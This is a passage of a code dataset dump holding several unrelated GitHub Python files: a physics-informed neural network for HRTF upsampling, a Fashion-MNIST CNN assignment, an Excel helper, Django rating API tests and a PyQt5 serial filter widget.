get_data(model,data_input,data_target) ## data loss \n loss_pde = get_pde(model,pde_input,wave_num1) ## pde loss \n loss = loss_data + loss_pde ## total loss \n g = tape.gradient(loss,model.trainable_variables) ## take the gradient of the trainable parameters with respect to the loss\n del tape\n return loss_data, loss_pde, g ## return the data_loss, pde_loss, and the gradient \n############################################################# \n### predict the HRTF for the test_input coordiantes \ndef get_test(model,test_input):\n test_pred = model(test_input) ## model prediction \n return test_pred ## return the prediction \n##############################################################################################################\n\n\n\n\n\n\n\n########################################################################################################################\n# some global variables \nspeed = 343; # speed of sound \nlr = 1e-3; # adam learning rate \nnum_epochs = 100*1000; # training epoches \nlayers = 3 # PINN depth\n########################################################################################################################\n\n\n\n\n\n\n\n########################################################################################################################\n## this is the training process \nfor human in range(40,41): ## human denote the ID of subjects, iterative over subject 11 to 50 \n ################################################################################################################\n ### prepare the training data \n file = str(human)+'.mat' \n data = sio.loadmat(file);\n #######################################\n total_hrtf = data['total_hrtf']; ## known HRTF + unknown HRTF = total HRTF, \n ## total HRTF is a [7 , 2 , 1260] tensor\n ## 7 is the number of frequency bins of interest \n\n ## total_hrtf[ ff, 0, 0:1260] is the real part of total HRTF at frequency ff\n ## total_hrtf[ ff, 1, 0:1260] is the imag part of total HRTF at frequency ff\n\n ## total_hrtf[ ff, 0, 0:630] is the real and left part of total HRTF at frequency ff\n ## total_hrtf[ ff, 0, 0:630] is the real and right part of total HRTF at frequency ff\n ## total_hrtf[ ff, 1, 630:1260] is the imag and left part of total HRTF at frequency ff\n ## total_hrtf[ ff, 1, 630:1260] is the imag and right part of total HRTF at frequency ff\n\n total_est = np.copy(total_hrtf); ## a tensor the same size as total_hrtf, it will store the total_hrtf estimation\n\n\n train_hrtf = data['train_hrtf']; ## known HRTF only \n ## train HRTF is a [7 , 2 , 330] tensor\n ## 7 is the number of frequency bins of interest \n\n ## train_hrtf[ ff, 0, 0:330] is the real part of train HRTF at frequency ff\n ## train_hrtf[ ff, 1, 0:330] is the imag part of train HRTF at frequency ff\n\n ## train_hrtf[ ff, 0, 0:165] is the real and left part of train HRTF at frequency ff\n ## train_hrtf[ ff, 0, 0:165] is the real and right part of train HRTF at frequency ff\n ## train_hrtf[ ff, 1, 165:330] is the imag and left part of train HRTF at frequency ff\n ## train_hrtf[ ff, 1, 165:330] is the imag and right part of train HRTF at frequency ff\n\n\n\n total_coor = data['total_coor']; ## coordiantes of the known and unkown HRTFs \n ## total_coor is a [1260,8] tensor \n ## total_coor[ii,0:8] is the coordiantes of the ii-th hrtf \n ## total_coor[ii,0:3] = [x, y, z]\n ## total_coor[ii,3:6] = [r, theta, phi] in radian \n ## total_coor[ii,6:8] = [ theta, phi] in degree \n\n\n train_coor = data['train_coor']; ## coordiantes of the known HRTF only 
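`get_pde` above penalises the residual of the Helmholtz equation, normalised by `wave_num1 = 1/k²` so that losses at different frequencies share a common scale. In the code's notation, with the network output playing the role of the pressure field p:

```latex
\nabla^{2} p + k^{2} p = 0, \qquad k = \frac{2\pi f}{c}
% get_pde minimises the mean squared, 1/k^2-normalised residual over the M collocation points:
\mathcal{L}_{\mathrm{PDE}} = \frac{1}{M}\sum_{m=1}^{M}
  \left( \frac{1}{k^{2}}\,\nabla^{2} p(\mathbf{x}_m) + p(\mathbf{x}_m) \right)^{2}
```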
\n ## train_coor is a [330,8] tensor \n ## train_coor[ii,0:8] is the coordiantes of the ii-th hrtf \n ## train_coor[ii,0:3] = [x, y, z]\n ## train_coor[ii,3:6] = [r, theta, phi] in radian \n ## train_coor[ii,6:8] = [ theta, phi] in degree \n ########################################\n freq_bb = data['freq_bins']; ## vectors saved by matlab into mat format will be 2D arrays when read by python\n ## var[0] will get the value of the vector\n freq_bins = freq_bb[0] ## a vector of frequency bins we are going to evaluate \n ## [2.1 4.1 6.2 8.2 10.3 12.3 14.4] kHz \n ########################################\n total_num = data['total_num']; ## total number of known and unknown HRTFs = 1260 \n train_num = data['train_num']; ## number of known HRTF = 330 \n total_num = total_num[0][0] ## variables saved by matlab into mat format will be 2D arrays when read by python\n train_num = train_num[0][0] ## var[0][0] will get the value of the variable \n\n total_mid = total_num//2 ## total_hrtf[ ff, 0, 0:total_mid] real and left part of total hrtf \n ## total_hrtf[ ff, 0, total_mid:total_num] real and right part of total hrtf \n ## total_hrtf[ ff, 1, 0:total_mid] imagl and left part of total hrtf \n ## total_hrtf[ ff, 1, total_mid:total_num] imagl and right part of total hrtf \n\n\n train_mid = train_num//2 ## train_hrtf[ ff, 0, 0:train_mid] real and left part of train hrtf \n ## train_hrtf[ ff, 0, train_mid:train_num] real and right part of train hrtf \n ## train_hrtf[ ff, 1, 0:train_mid] imagl and left part of train hrtf \n ## train_hrtf[ ff, 1, train_mid:train_num] imagl and right part of train hrtf \n ################################################################################################################\n for ff in range(0,7): ## iterative over frequency \n ###############################\n ### the wave number \n freq = freq_bins[ff]; ## the current frequency \n wave_num = 2*np.pi*freq/speed; ## the wave number \n wave_num1 = 1.0/(wave_num**2); ## a factor used for normalizing the Laplacian \n ###############################\n ### the node number ## calculate the number of neurons in hidden layer according the frequency \n nodes = 0;\n if freq<3000: ## f<3000, neuron = f/500 \n nodes = int(np.ceil(freq/500));\n elif freq>6000:\n nodes = int(np.ceil(freq/1000)); ## f>6000, neuron = f/1000 \n else:\n nodes = 6; ## else neuron = 6 \n ##########################################################################################################################################\n for dd in range(4): ## 4 pinn methods to model the [real left], [real right], [imaginary left], [imaginar right] part of HRTF \n if dd==0: ## real left\n ####################################################################################################\n data_train = np.zeros((train_mid,1)); ### use the real and left known HRTF as training data \n xyz_train = np.zeros((train_mid,3)) ### the real and left known HRTF's cartesian coordinates \n xyz_total = np.zeros((total_mid,3)) ### the real and left [known + unknown] total HRTF's cartesian coordinates \n for ii in range(train_mid):\n data_train[ii,0] = train_hrtf[ff,0,ii] ### get the traning data \n xyz_train[ii,0:3] = train_coor[ii,0:3] ### and the corresponding coordinates \n for ii in range(total_mid):\n xyz_total[ii,0:3] = total_coor[ii,0:3] ### get the coordiantes used for PDE loss calculation \n ####################################################################################################\n elif dd==1: ## real right\n 
####################################################################################################\n data_train = np.zeros((train_num-train_mid,1)); ### same as above but for the real and right part \n xyz_train = np.zeros((train_num-train_mid,3))\n xyz_total = np.zeros((total_num-total_mid,3))\n for ii in range(train_mid,train_num):\n data_train[ii-train_mid,0] = train_hrtf[ff,0,ii] \n xyz_train[ii-train_mid,0:3] = train_coor[ii,0:3] \n for ii in range(total_mid,total_num):\n xyz_total[ii-total_mid,0:3] = total_coor[ii,0:3] \n ####################################################################################################\n elif dd==2: ## imag left\n ####################################################################################################\n data_train = np.zeros((train_mid,1)); ### same as above but for the imaginary and left part \n xyz_train = np.zeros((train_mid,3))\n xyz_total = np.zeros((total_mid,3))\n for ii in range(train_mid):\n data_train[ii,0] = train_hrtf[ff,1,ii] \n xyz_train[ii,0:3] = train_coor[ii,0:3] \n for ii in range(total_mid):\n xyz_total[ii,0:3] = total_coor[ii,0:3] \n ####################################################################################################\n else: ## imag right\n ####################################################################################################\n data_train = np.zeros((train_num-train_mid,1)); ### same as above but for the imaginary and right part \n xyz_train = np.zeros((train_num-train_mid,3))\n xyz_total = np.zeros((total_num-total_mid,3))\n for ii in range(train_mid,train_num):\n data_train[ii-train_mid,0] = train_hrtf[ff,1,ii] \n xyz_train[ii-train_mid,0:3] = train_coor[ii,0:3] \n for ii in range(total_mid,total_num):\n xyz_total[ii-total_mid,0:3] = total_coor[ii,0:3] \n #########################################################################################################################################\n xyz_train = tf.convert_to_tensor(xyz_train, dtype=tf.float32) ### transfer the numpy data into tensorflow data, float32 format \n data_train = tf.convert_to_tensor(data_train, dtype=tf.float32)\n xyz_total = tf.convert_to_tensor(xyz_total, dtype=tf.float32)\n wave_num1 = tf.convert_to_tensor(wave_num1, dtype=tf.float32)\n #########################################################################################################################################\n ## the core training process \n now_err = 0 ### record the current data loss \n ### the PINN training is sensitive to network initialization, the training is repeated five times\n ### we select the training with the least data loss as the training result \n for cc in range(5): \n #####################################################################################################\n ### this line of code will clear the memory used by a model after it finish \n ### with out it, you will run out of memory quickly \n tf.keras.backend.clear_session() \n #####################################################################################################\n ### tell tensorflow to build up a static graph for the model_fit function \n ### the core model fitting/traning function \n @tf.function\n def model_fit(model,data_input,data_target,pde_input,wave_num1):\n loss_data,loss_pde,grad=get_grad(model,data_input,data_target,pde_input,wave_num1)\n optim.apply_gradients(zip(grad,model.trainable_variables))\n return loss_data, loss_pde\n #####################################################################################################\n model = 
init_model(3,layers,nodes) ## initialize a model with input number, hidden layer number, and nodes number \n optim = tf.keras.optimizers.legacy.Adam(learning_rate = lr) ### we use the ADAM optimizer\n db_true = 10*np.log10(tf.reduce_mean(tf.square(data_train)))/0.1/10 ### energy of the training HRTF in dB \n ##################################################################################################### \n ### let us train \n for jj in range(1,num_epochs):\n loss_data,loss_pde=model_fit(model,xyz_train,data_train,xyz_total,wave_num1)\n ##################################################################################################### \n loss_data_db = (10*np.log10(loss_data) - db_true)//0.1/10 ## the data loss \n loss_pde_db = 10*np.log10(loss_pde)//0.1/10 ## pde loss \n now = datetime.now() ## current date and time\n now = now.strftime(\"%H:%M:%S\")\n ## print data loss, pde loss, layer number, neuron number, for subject huamn at frequency ff\n print(ff,'ID',human,'T',now,'L',layers,'N',nodes,'R',dd,loss_data_db,loss_pde_db) \n #######################################################################################################\n ### if the current data loss is smaller \n if loss_data_db < now_err:\n #########################################################\n now_err = loss_data_db; ### store the data loss \n pinn_pred = get_test(model,xyz_total); ### predict the HRTF at [known + unknown] total HRTF coordinates \n pinn_pred = pinn_pred.numpy(); ### transfer the prediction into numpy format \n #########################################################\n if dd==0:\n for ii in range(total_mid): ### store the real left HRTF prediction into the total_est\n total_est[ff,0,ii] = pinn_pred[ii][0]\n elif dd==1: \n for ii in range(total_mid,total_num): ### store the real right HRTF prediction into the total_est\n total_est[ff,0,ii] = pinn_pred[ii-total_mid][0]\n elif dd==2:\n for ii in range(total_mid): ### store the imag left HRTF prediction into the total_est\n total_est[ff,1,ii] = pinn_pred[ii][0]\n else:\n for ii in range(total_mid,total_num): ### store the imag right HRTF prediction into the total_est\n total_est[ff,1,ii] = pinn_pred[ii-total_mid][0]\n #######################################################################################################\n ### good enough, stop \n if now_err<-29.0: ### if the current data loss is small enough, we do not repeat the training 5 times, stop it. \n break; \n print('------------------------------------------') \n ################################################################################################## \n ### save the result into a file \n newfile = str(human) + '_L' + str(layers) + '.mat' \n sio.savemat(newfile,{'total_hrtf':total_hrtf,'total_est':total_est,'total_coor':total_coor,'train_coor':train_coor}); \n #################################################################################################################### \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"feima1024/PINN-for-HRTF-upsampling","sub_path":"pinn.py","file_name":"pinn.py","file_ext":"py","file_size_in_byte":22602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21934786111","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ___\n# \n#
 [CLRSWY logo]\n# \n# ___\n\n# Deep Learning \n# Assignment-2 (CNN) \n# Image Classification with CNN
\n\n# # Task and Dataset Info\n# \n# Welcome to second assignment of Deep learning lesson. Follow the instructions and complete the assignment.\n# \n# **Build an image classifier with Convolutional Neural Networks for the Fashion MNIST dataset. This data set includes 10 labels of different clothing types with 28 by 28 *grayscale* images. There is a training set of 60,000 images and 10,000 test images.**\n# \n# Label\tDescription\n# 0\t T-shirt/top\n# 1\t Trouser\n# 2\t Pullover\n# 3\t Dress\n# 4\t Coat\n# 5\t Sandal\n# 6\t Shirt\n# 7\t Sneaker\n# 8\t Bag\n# 9\t Ankle boot\n\n# # Import Libraries\n\n# In[1]:\n\n\ntry:\n import jupyter_black\n jupyter_black.load()\nexcept ImportError:\n print(\"You can safely ignore this message.\")\n\n\n# In[2]:\n\n\nimport os\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"1\"\n\n\n# In[3]:\n\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib.image import imread\nfrom tensorflow import keras\n\n# import warnings\n# warnings.filterwarnings(\"ignore\")\n# warnings.warn(\"this will not show\")\n\nplt.rcParams[\"figure.figsize\"] = (10, 6)\n\nsns.set_style(\"whitegrid\")\npd.set_option(\"display.float_format\", lambda x: \"%.3f\" % x)\n\n# Set it None to display all rows in the dataframe\n# pd.set_option('display.max_rows', None)\n\n# Set it to None to display all columns in the dataframe\npd.set_option(\"display.max_columns\", None)\n\n\n# In[4]:\n\n\nimport tensorflow as tf\n\nif tf.config.list_physical_devices(\"GPU\"):\n print(\"GPU support is enabled for this session.\")\nelse:\n print(\"CPU will be used for this session.\")\n\n\n# In[5]:\n\n\n# Set the seed using keras.utils.set_random_seed. This will set:\n# 1) `numpy` seed\n# 2) `tensorflow` random seed\n# 3) `python` random seed\nSEED = 42\nkeras.utils.set_random_seed(SEED)\n\n# This will make TensorFlow ops as deterministic as possible, but it will\n# affect the overall performance, so it's not enabled by default.\n# `enable_op_determinism()` is introduced in TensorFlow 2.9.\ntf.config.experimental.enable_op_determinism()\n\n\n# # Recognizing and Understanding Data\n# \n# **TASK 1: Run the code below to download the dataset using Keras.**\n\n# In[6]:\n\n\nfrom tensorflow.keras.datasets import fashion_mnist\n\n(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n\n\n# In[7]:\n\n\nprint(f\"There are {len(x_train)} images in the training dataset\")\nprint(f\"There are {len(x_test)} images in the test dataset\")\n\n\n# In[8]:\n\n\nx_train[5].shape\n\n\n# **TASK 2: Use matplotlib to view an image from the data set. It can be any image from the data set.**\n\n# In[9]:\n\n\nclasses=[\"T-shirt/top\", \"Trouser\",\"Pullover\",\"Dress\",\"Coat\",\"Sandal\",\"Shirt\",\"Sneaker\",\"Bag\",\"Ankle boot\"]\n\n\n# In[10]:\n\n\nimport matplotlib.pyplot as plt\n\n# Choose an image\nindex = 97 \n\n# Display the selected image along with its class name\nplt.figure()\nplt.imshow(x_train[index], cmap='gray')\nplt.title(f'Class: {classes[y_train[index]]}')\nplt.show()\n\n\n# # Data Preprocessing\n# \n# **TASK 3: Normalize the X train and X test data by dividing by the max value of the image arrays.**\n\n# In[11]:\n\n\nmax_pixel_value = np.max(x_train)\n\n# Normalize the data by dividing by the maximum pixel value\nx_train = x_train / max_pixel_value\nx_test = x_test / max_pixel_value\nmax_pixel_value\n\n\n# **Task 4: Reshape the X arrays to include a 4 dimension of the single channel. 
Similar to what we did for the numbers MNIST data set.**\n\n# In[12]:\n\n\n# Reshape the X arrays to include the single channel\nx_train = x_train.reshape(x_train.shape[0], 28, 28, 1)\nx_test = x_test.reshape(x_test.shape[0], 28, 28, 1)\n\n\n# **TASK 5: Convert the y_train and y_test values to be one-hot encoded for categorical analysis by Keras.**\n\n# In[13]:\n\n\nfrom tensorflow.keras.utils import to_categorical\n\n\n# In[14]:\n\n\n# Convert y_train and y_test to one-hot encoded format\ny_train = to_categorical(y_train, num_classes=10) \ny_test = to_categorical(y_test, num_classes=10)\n\n\n# # Modeling\n\n# ## Create the model\n# \n# **TASK 5: Use Keras to create a model consisting of at least the following layers (but feel free to experiment):**\n# \n# * 2D Convolutional Layer, filters=28 and kernel_size=(3,3)\n# * Pooling Layer where pool_size = (2,2) strides=(1,1)\n# \n# * Flatten Layer\n# * Dense Layer (128 Neurons, but feel free to play around with this value), RELU activation\n# \n# * Final Dense Layer of 10 Neurons with a softmax activation\n# \n# **Then compile the model with these parameters: loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']**\n\n# In[15]:\n\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense\n\n# Create the model\nmodel = Sequential()\n\n# 2D Convolutional Layer, filters=28 and kernel_size=(3,3)\nmodel.add(Conv2D(28, (3, 3), activation='relu', input_shape=(28, 28, 1)))\n\n# Pooling Layer where pool_size = (2,2) strides=(1,1)\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n# Flatten Layer\nmodel.add(Flatten())\n\n# Dense Layer with 128 neurons and ReLU activation\nmodel.add(Dense(128, activation='relu'))\n\n# Final Dense Layer of 10 Neurons with a softmax activation\nmodel.add(Dense(10, activation='softmax'))\n\n# Compile the model with the specified parameters\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n\n# ## Model Training \n# \n# **TASK 6: Train/Fit the model to the x_train set by using EarlyStop. Amount of epochs is up to you.**\n\n# In[16]:\n\n\nfrom tensorflow.keras.callbacks import EarlyStopping\n\n\n# In[17]:\n\n\nearly_stopping = EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)\n\n\n# In[18]:\n\n\nhistory = model.fit(x_train, y_train, epochs=50, validation_split=0.2, callbacks=[early_stopping])\n\n\n# **TASK 7: Plot values of metrics you used in your model.**\n\n# In[19]:\n\n\n# Get training and validation loss and accuracy\ntraining_loss = history.history['loss']\nvalidation_loss = history.history['val_loss']\ntraining_accuracy = history.history['accuracy']\nvalidation_accuracy = history.history['val_accuracy']\n\n# plot for the training and validation loss\nplt.figure(figsize=(12, 4))\nplt.subplot(1, 2, 1)\nplt.plot(training_loss, label='Training Loss')\nplt.plot(validation_loss, label='Validation Loss')\nplt.title('Training and Validation Loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\n\n# plot for the training and validation accuracy\nplt.subplot(1, 2, 2)\nplt.plot(training_accuracy, label='Training Accuracy')\nplt.plot(validation_accuracy, label='Validation Accuracy')\nplt.title('Training and Validation Accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\n\nplt.tight_layout()\nplt.show()\n\n\n# ## Model Evaluation\n# \n# **TASK 8: Show the accuracy,precision,recall,f1-score the model achieved on the x_test data set. 
Keep in mind, there are quite a few ways to do this, but we recommend following the same procedure we showed in the MNIST lecture.**\n\n# In[20]:\n\n\nfrom sklearn.metrics import classification_report\n\n\n# In[21]:\n\n\n# Predict the classes on the x_test data\ny_pred = model.predict(x_test)\n\n\n# In[22]:\n\n\n# Convert the one-hot encoded predictions to class labels\ny_pred_labels = np.argmax(y_pred, axis=1)\n\n\n# In[23]:\n\n\n# Convert one-hot encoded ground truth labels to class labels\ny_test_labels = np.argmax(y_test, axis=1)\n\n\n# In[24]:\n\n\n# Calculate the classification report\nreport = classification_report(y_test_labels, y_pred_labels)\n\nprint(report)\n\n\n# In[25]:\n\n\nunique, counts = np.unique(y_test_labels, return_counts=True)\n\n# Create a dictionary to display the count of data samples for each class\nclass_count = dict(zip(unique, counts))\n\n# Print the count of data samples for each class\nfor class_label, count in class_count.items():\n print(f\"Class {class_label}: {count} samples\")\n\n\n# ## Prediction\n\n# In[53]:\n\n\nnew_image = x_test[54]\n\n\n# In[54]:\n\n\nnew_image.shape\n\n\n# In[55]:\n\n\nplt.imshow(new_image)\nplt.show()\n\n\n# In[56]:\n\n\nimage_prediction = model.predict(new_image.reshape(1, 28, 28, 1))\n\n\n# In[57]:\n\n\npredicted_label = np.argmax(image_prediction)\n\n# Display the predicted class label\nprint(f\"Predicted Label: {classes[int(predicted_label)]}\")\n\n\n# # End of Assignment\n\n# ___\n# \n#
 [CLRSWY logo]
\n# \n# ___\n","repo_name":"Brho0m/cnn","sub_path":"Image_Classification_with_CNN.py","file_name":"Image_Classification_with_CNN.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15107200274","text":"import xlrd\nimport xlwt\nimport openpyxl\nfrom config.setting import excel_path\nfrom config.setting import api_excel_path\n\nclass Excel_Opertion(object):\n \"\"\"excel表数据相关操作\"\"\"\n\n def __init__(self,ex_path=None,index=None):\n if ex_path == None:\n self.excel_path = excel_path # 默认excel文件路径\n else:\n self.excel_path = ex_path\n if index == None:\n index = 0\n self.data = xlrd.open_workbook(self.excel_path)\n self.table = self.data.sheets()[index] # sheets第一页数据\n\n # 获取excel数据,按照每行一个list,添加到一个大的list里面\n def get_data(self):\n result = []\n rows = self.get_lines()\n head=self.table.row_values(0)\n if rows !=None:\n for i in range(1,rows):\n row = self.table.row_values(i)\n # 过滤不执行的用例\n if row[-1] == 'F':continue\n result.append(dict(zip(head,row)))\n return result\n return None\n\n def api_get_data(self):\n result = []\n rows = self.get_lines()\n head=self.table.row_values(0)\n if rows !=None:\n for i in range(1,rows):\n row = self.table.row_values(i)\n # 将用例名称一一对应\n result.append(dict.fromkeys((row[0],),dict(zip(head[1:],row[1:]))))\n return result\n return None\n\n def api_update_data(self,row,column,eq):\n workbook = openpyxl.load_workbook(api_excel_path)\n worksheet = workbook.worksheets[0]\n worksheet.cell(row, column, eq)\n workbook.save(api_excel_path)\n\n # 获取excel行数\n def get_lines(self):\n rows = self.table.nrows # 获取行数\n if rows > 1:\n return rows\n return None\n\n\nif __name__ == '__main__':\n a=Excel_Opertion()\n a.api_update_data(1,2)","repo_name":"newcaolaing/web_auto","sub_path":"util/exl.py","file_name":"exl.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"74992301628","text":"from django.test import TestCase\nfrom django.shortcuts import reverse\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom tests.factories.course import CourseFactory\nfrom tests.factories.rating import RatingFactory\nfrom tests.factories.user import UserFactory\n\nfrom udemy.apps.course.models import CourseRelation\nfrom udemy.apps.rating.models import Rating\nfrom udemy.apps.rating.serializer import RatingSerializer\n\nRATING_LIST_URL = reverse('rating:rating-list')\n\n\ndef rating_detail_url(pk): return reverse('rating:rating-detail', kwargs={'pk': pk})\n\n\nclass TestRatingUnauthenticatedRequests(TestCase):\n \"\"\"Test unauthenticated API requests.\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_rating_retrieve(self):\n rating = RatingFactory()\n\n response = self.client.get(rating_detail_url(pk=rating.id))\n\n serializer = RatingSerializer(rating)\n\n self.assertEqual(response.data, serializer.data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_unauthenticated_cant_create_rating(self):\n response = self.client.post(RATING_LIST_URL)\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass TestRatingAuthenticatedRequests(TestCase):\n \"\"\"Test authenticated API requests.\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n self.user = UserFactory()\n self.client.force_authenticate(self.user)\n\n def test_rating_create(self):\n course = CourseFactory()\n 
CourseRelation.objects.create(course=course, creator=self.user)\n\n payload = {\n 'course': course.id,\n 'rating': 3,\n 'comment': 'test',\n }\n\n response = self.client.post(RATING_LIST_URL, payload)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertTrue(Rating.objects.filter(id=response.data['id']).exists())\n\n def test_partial_rating_update(self):\n original_comment = 'original comment'\n course = CourseFactory()\n CourseRelation.objects.create(course=course, creator=self.user)\n rating = RatingFactory(course=course, comment=original_comment, creator=self.user)\n\n payload = {\n 'rating': 3,\n }\n response = self.client.patch(rating_detail_url(pk=rating.id), payload)\n\n rating.refresh_from_db()\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(rating.rating, payload['rating'])\n self.assertEqual(rating.comment, original_comment)\n\n def test_rating_full_update(self):\n course = CourseFactory()\n CourseRelation.objects.create(course=course, creator=self.user)\n rating = RatingFactory(course=course, creator=self.user)\n\n payload = {\n 'rating': 3,\n 'comment': 'new comment',\n }\n response = self.client.put(rating_detail_url(pk=rating.id), payload)\n\n rating.refresh_from_db()\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(rating.rating, payload['rating'])\n self.assertEqual(rating.comment, payload['comment'])\n\n def test_delete_rating(self):\n course = CourseFactory()\n CourseRelation.objects.create(course=course, creator=self.user)\n rating = RatingFactory(course=course, creator=self.user)\n\n response = self.client.delete(rating_detail_url(pk=rating.id))\n\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertFalse(Rating.objects.filter(id=rating.id).exists())\n\n","repo_name":"gabrielustosa/udemy-old","sub_path":"udemy/apps/rating/tests/test_rating_api.py","file_name":"test_rating_api.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36159858388","text":"from PyQt5.QtWidgets import QTableWidget, QTableWidgetItem, QWidget, QHBoxLayout, QVBoxLayout, QPushButton, QLineEdit, QSizePolicy\nfrom PyQt5.Qt import QFont, QItemSelectionModel\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QHeaderView\nimport Globals\nimport serial\nimport time\n\n## @package HardwareFilter\n# A widget that interacts with the microcontroller in order to\n# filter the packets controller-sided \n\n\n## The actual implementation of the HardwareFilter class\nclass HardwareFilter(QWidget):\n \n ## The constructor initialize superclass\n def __init__(self):\n super(HardwareFilter,self).__init__()\n self.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding))\n self.layoutingComplete = False\n self.setUi()\n\n ## Create the Widget-Layout\n def setUi(self):\n self.H1layout = QHBoxLayout()\n self.Vlayout = QVBoxLayout()\n \n self.searchInputField = QLineEdit()\n self.searchInputField.setPlaceholderText('Enter search term, then click search')\n self.searchButt = QPushButton('Search Table')\n self.saveFilterButt = QPushButton('Send filter to device')\n \n self.saveFilterButt.clicked.connect(self.saveFilter) \n self.searchButt.clicked.connect(lambda: self.searchInTable(self.searchInputField.text(),0))\n \n # Create Filter-Table\n self.filterTableIndex = 0\n self.filterTable = QTableWidget()\n self.filterTableItem = QTableWidgetItem()\n 
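        # Note on the wire format used by saveFilter() further down: the checkbox
        # states are collected into a '1'/'0' string (one char per ID row), padded
        # with '1's to 104 bits, split into 8-char groups, and each group is
        # bit-reversed before the int() conversion, so the first table row maps to
        # the least significant bit of the first byte, e.g.
        #     int('10000000'[::-1], 2) == 1   ->  b'\\x01'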
self.filterTable.setRowCount(0)\n self.filterTable.setColumnCount(2)\n \n self.filterTable.setHorizontalHeaderLabels('informationID;Enable'.split(';'))\n self.filterTable.resizeColumnsToContents()\n self.filterTableHeader = self.filterTable.horizontalHeader()\n self.filterTableHeader.setSectionResizeMode(0, QHeaderView.Stretch)\n self.filterTableHeader.setSectionResizeMode(1, QHeaderView.ResizeToContents) \n \n font = self.getFont()\n \n self.checkBoxAllIds = self.createCheckBox()\n self.filterTable.itemChanged.connect(self.filterAllIDs)\n self.checkBoxAllMessages = self.createCheckBox()\n \n # -- Add first Row for all -- #\n self.filterTable.insertRow(self.filterTableIndex)\n idFilterItem = QTableWidgetItem('FILTER ALL IDs')\n idFilterItem.setFont(font)\n self.filterTable.setItem(self.filterTableIndex,0,idFilterItem)\n self.filterTable.setItem(self.filterTableIndex,1,self.checkBoxAllIds)\n self.filterTableIndex = self.filterTableIndex + 1\n \n # -- Add informationID filter rows -- #\n for keys, values in Globals.tspDict.items():\n if values[0].startswith('ID'):\n checkBoxFilter = self.createCheckBox()\n self.filterTable.insertRow(self.filterTableIndex)\n self.filterTable.setItem(self.filterTableIndex,0,QTableWidgetItem(values[0]))\n self.filterTable.setItem(self.filterTableIndex,1,checkBoxFilter)\n self.filterTableIndex = self.filterTableIndex + 1 \n \n self.H1layout.addWidget(self.searchInputField)\n self.H1layout.addWidget(self.searchButt) \n self.Vlayout.addLayout(self.H1layout)\n self.Vlayout.addWidget(self.filterTable)\n self.Vlayout.addWidget(self.saveFilterButt)\n #------------------------------------ \n self.setLayout(self.Vlayout)\n self.layoutingComplete = True\n \n def searchInTable(self, textToSearch, column):\n tableModel = self.filterTable.model()\n start = tableModel.index(0, column)\n matches = tableModel.match(start, Qt.DisplayRole, textToSearch, 1, Qt.MatchContains)\n if matches:\n index = matches[0]\n self.filterTable.selectionModel().select(\n index, QItemSelectionModel.Select)\n self.filterTable.scrollToItem(self.filterTable.itemFromIndex(index))\n \n ## Sends a series of filter packets to the controller based on TSP specification and \n # the user inputs on the filterTable. \n def saveFilter(self):\n #--Save by ID--#\n rowCnt = self.filterTable.rowCount()\n # Document this later... no idea what I did there\n # I think it goes like this:\n # \\n-> We go through the table and append a 1 to a string if a box is checked and a 0 if not\n # \\n-> We convert this '10011011..' string to a series of bytes via TSP section XXX\n # \\n-> We send to the filter byte-for-byte to the controller\n filterStr = ''\n for rows in range(1,rowCnt): \n if self.filterTable.item(rows,1).checkState() == Qt.Checked:\n #print(self.filterTable.item(rows,0).text())\n filterStr = filterStr + '1'\n else:\n filterStr = filterStr + '0'\n filterStr = filterStr.ljust(104,'1')\n concattedBytes = filterStr\n import re\n concattedBytes = re.findall('........', filterStr) \n print(concattedBytes)\n byteList = []\n for byteStr in concattedBytes:\n byteList.append(bytes([int(byteStr[::-1],2)]))\n print(byteList)\n # Now we send the converted bytes over Serial interface\n try:\n self.serialHandle = serial.Serial(Globals.dockDict['dockConfig'].snifferConfig.configCom,int(Globals.dockDict['dockConfig'].snifferConfig.configBaud),timeout=3,parity=serial.PARITY_NONE,rtscts=False,dsrdtr=False)\n except Exception as ex:\n template = \"An exception of type {0} occurred. 
